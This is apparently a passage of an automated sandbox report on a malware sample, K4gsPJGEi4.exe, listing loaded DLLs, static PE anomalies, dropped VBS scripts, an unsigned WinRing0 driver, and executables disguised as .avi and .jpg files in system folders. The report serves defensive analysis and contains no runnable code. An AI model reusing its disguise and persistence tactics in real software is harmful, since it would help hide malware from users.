Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: fsutilext.dll

Source: C:\Users\user\Desktop\K4gsPJGEi4.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

File written: C:\Users\user\AppData\Local\Temp\config.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: K4gsPJGEi4.exe

Static file information: File size 13410304 > 1048576

Source: K4gsPJGEi4.exe

Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0xcb3a00

Source:	Binary string: aeroadmin.pdb source: K4gsPJGEi4.exe, IntelSvc.exe.0.dr, IntelSvc.exe1.15.dr, tv_x86.exe.15.dr, IntelSvc.exe0.15.dr, In.avi.15.dr
Source:	Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: K4gsPJGEi4.exe, Ri.avi.15.dr, WinRing0x64.sys0.15.dr, WinRing0x64.sys.15.dr, WinRing0x64.txt.0.dr
Source:	Binary string: aeroadmin.pdbXu source: K4gsPJGEi4.exe, IntelSvc.exe.0.dr, IntelSvc.exe1.15.dr, tv_x86.exe.15.dr, IntelSvc.exe0.15.dr, In.avi.15.dr

Source: C:\Users\user\AppData\Local\Temp\screen.exe

Code function: 18_2_004044CF LoadLibraryA,GetProcAddress,

18_2_004044CF

Source: sc.avi.15.dr	Static PE information: real checksum: 0x0 should be: 0x18b14
Source: Sy.avi.15.dr	Static PE information: real checksum: 0x11186a should be: 0x107332
Source: Systemfo.jpg.15.dr	Static PE information: real checksum: 0x11186a should be: 0x107332
Source: Systemfont.exe.15.dr	Static PE information: real checksum: 0x11186a should be: 0x107332
Source: Systemfont.txt.0.dr	Static PE information: real checksum: 0x11186a should be: 0x107332
Source: screen.exe0.15.dr	Static PE information: real checksum: 0x0 should be: 0x18b14
Source: screen.exe.15.dr	Static PE information: real checksum: 0x0 should be: 0x18b14
Source: scre.jpg.15.dr	Static PE information: real checksum: 0x0 should be: 0x18b14
Source: screen.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x18b14

Source: cmdow.exe.0.dr	Static PE information: section name: .eh_fram
Source: Systemfont.txt.0.dr	Static PE information: section name: /4
Source: Systemfont.txt.0.dr	Static PE information: section name: /14
Source: Systemfont.txt.0.dr	Static PE information: section name: /29
Source: Systemfont.txt.0.dr	Static PE information: section name: /41
Source: Systemfont.txt.0.dr	Static PE information: section name: /55
Source: Systemfont.txt.0.dr	Static PE information: section name: /67
Source: Systemfont.txt.0.dr	Static PE information: section name: /80
Source: Systemfont.txt.0.dr	Static PE information: section name: /91
Source: Systemfont.txt.0.dr	Static PE information: section name: /102
Source: RtkAudio.txt.0.dr	Static PE information: section name: .xdata
Source: cmdow.exe.15.dr	Static PE information: section name: .eh_fram
Source: cmdow.exe0.15.dr	Static PE information: section name: .eh_fram
Source: Systemfont.exe.15.dr	Static PE information: section name: /4
Source: Systemfont.exe.15.dr	Static PE information: section name: /14
Source: Systemfont.exe.15.dr	Static PE information: section name: /29
Source: Systemfont.exe.15.dr	Static PE information: section name: /41
Source: Systemfont.exe.15.dr	Static PE information: section name: /55
Source: Systemfont.exe.15.dr	Static PE information: section name: /67
Source: Systemfont.exe.15.dr	Static PE information: section name: /80
Source: Systemfont.exe.15.dr	Static PE information: section name: /91
Source: Systemfont.exe.15.dr	Static PE information: section name: /102
Source: RtkAudio.exe.15.dr	Static PE information: section name: .xdata
Source: RtkAudio.exe0.15.dr	Static PE information: section name: .xdata
Source: RtkAudio.exe1.15.dr	Static PE information: section name: .xdata
Source: cmdo.jpg.15.dr	Static PE information: section name: .eh_fram
Source: cm.avi.15.dr	Static PE information: section name: .eh_fram
Source: Systemfo.jpg.15.dr	Static PE information: section name: /4
Source: Systemfo.jpg.15.dr	Static PE information: section name: /14
Source: Systemfo.jpg.15.dr	Static PE information: section name: /29
Source: Systemfo.jpg.15.dr	Static PE information: section name: /41
Source: Systemfo.jpg.15.dr	Static PE information: section name: /55
Source: Systemfo.jpg.15.dr	Static PE information: section name: /67
Source: Systemfo.jpg.15.dr	Static PE information: section name: /80
Source: Systemfo.jpg.15.dr	Static PE information: section name: /91
Source: Systemfo.jpg.15.dr	Static PE information: section name: /102
Source: Sy.avi.15.dr	Static PE information: section name: /4
Source: Sy.avi.15.dr	Static PE information: section name: /14
Source: Sy.avi.15.dr	Static PE information: section name: /29
Source: Sy.avi.15.dr	Static PE information: section name: /41
Source: Sy.avi.15.dr	Static PE information: section name: /55
Source: Sy.avi.15.dr	Static PE information: section name: /67
Source: Sy.avi.15.dr	Static PE information: section name: /80
Source: Sy.avi.15.dr	Static PE information: section name: /91
Source: Sy.avi.15.dr	Static PE information: section name: /102
Source: Aud.jpg.15.dr	Static PE information: section name: .xdata
Source: Au.avi.15.dr	Static PE information: section name: .xdata

Source: C:\Users\user\AppData\Local\Temp\screen.exe	Code function: 18_2_00410C10 push eax; ret	18_2_00410C24
Source: C:\Users\user\AppData\Local\Temp\screen.exe	Code function: 18_2_00410C10 push eax; ret	18_2_00410C4C
Source: C:\Users\user\AppData\Local\Temp\screen.exe	Code function: 18_2_00410BD5 push ecx; ret	18_2_00410BE5

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior

Command shell drops VBS files

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\est1.vbs	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\Vnoad.vbs	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\stwinvr.vbs	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\aatem.vbs	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\aapub.vbs	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\aapro.vbs	Jump to behavior

Sample is not signed and drops a device driver

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\Public\WinRing0x64.sys			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\WinRing0x64.sys			Jump to behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: attrib.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: attrib.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: attrib.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: attrib.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: attrib.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: attrib.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: attrib.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: attrib.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: attrib.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: attrib.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: attrib.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: attrib.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: attrib.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: attrib.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: attrib.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: attrib.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: attrib.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: attrib.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: attrib.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: attrib.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: attrib.exe	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\Public\cmdow.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\SysWOW64\en\Ri.avi	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\ProgramData\screen.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\SysWOW64\en\sc.avi	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\Public\WinRing0x64.sys	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\Public\screen.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\WinRing0x64.sys	Jump to dropped file
Source: C:\Users\user\Desktop\K4gsPJGEi4.exe	File created: C:\Users\user\AppData\Local\Temp\IntelSvc.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\Tweaker\IntelS.jpg	Jump to dropped file
Source: C:\Users\user\Desktop\K4gsPJGEi4.exe	File created: C:\Users\user\AppData\Local\Temp\RtkAudio.txt	Jump to dropped file
Source: C:\Users\user\Desktop\K4gsPJGEi4.exe	File created: C:\Users\user\AppData\Local\Temp\Systemfont.txt	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\Public\IntelSvc.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\ProgramData\IntelSvc.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\SysWOW64\en\Au.avi	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\tv_x86.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\Tweaker\cmdo.jpg	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\Tfile\IntelSvc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\K4gsPJGEi4.exe	File created: C:\Users\user\AppData\Local\Temp\cmdow.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\SysWOW64\en\In.avi	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\Tweaker\scre.jpg	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\Public\RtkAudio.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\SysWOW64\en\cm.avi	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\Tweaker\Systemfo.jpg	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\SysWOW64\en\Sy.avi	Jump to dropped file
Source: C:\Users\user\Desktop\K4gsPJGEi4.exe	File created: C:\Users\user\AppData\Local\Temp\WinRing0x64.txt	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\Systemfont.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\RtkAudio.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\SysWOW64\RuntimeBroker.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\Tweaker\Aud.jpg	Jump to dropped file
Source: C:\Users\user\Desktop\K4gsPJGEi4.exe	File created: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\OneDrive\fontdrvhots.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\Tweaker\Ring0x.jpg	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\ProgramData\cmdow.exe	Jump to dropped file
Source: C:\Users\user\Desktop\K4gsPJGEi4.exe	File created: C:\Users\user\AppData\Local\Temp\screen.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\Tfile\RtkAudio.exe	Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\ProgramData\screen.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\ProgramData\IntelSvc.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\ProgramData\cmdow.exe	Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\Public\cmdow.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\Public\RtkAudio.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\Public\WinRing0x64.sys	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\Public\screen.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\Public\IntelSvc.exe	Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\SysWOW64\en\Ri.avi	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\SysWOW64\en\sc.avi	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\SysWOW64\en\cm.avi	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\SysWOW64\en\Sy.avi	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\SysWOW64\RuntimeBroker.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\SysWOW64\en\Au.avi	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\SysWOW64\en\In.avi	Jump to dropped file

Source: C:\Users\user\Desktop\K4gsPJGEi4.exe	File created: C:\Users\user\AppData\Local\Temp\Systemfont.txt	Jump to dropped file
Source: C:\Users\user\Desktop\K4gsPJGEi4.exe	File created: C:\Users\user\AppData\Local\Temp\WinRing0x64.txt	Jump to dropped file
Source: C:\Users\user\Desktop\K4gsPJGEi4.exe	File created: C:\Users\user\AppData\Local\Temp\RtkAudio.txt	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\Tweaker\IntelS.jpg	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\Tweaker\scre.jpg	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\SysWOW64\en\sc.avi	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\Tweaker\cmdo.jpg	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\SysWOW64\en\cm.avi	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\Tweaker\Systemfo.jpg	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\SysWOW64\en\Sy.avi	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\Tweaker\Aud.jpg	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\SysWOW64\en\Au.avi	Jump to dropped file
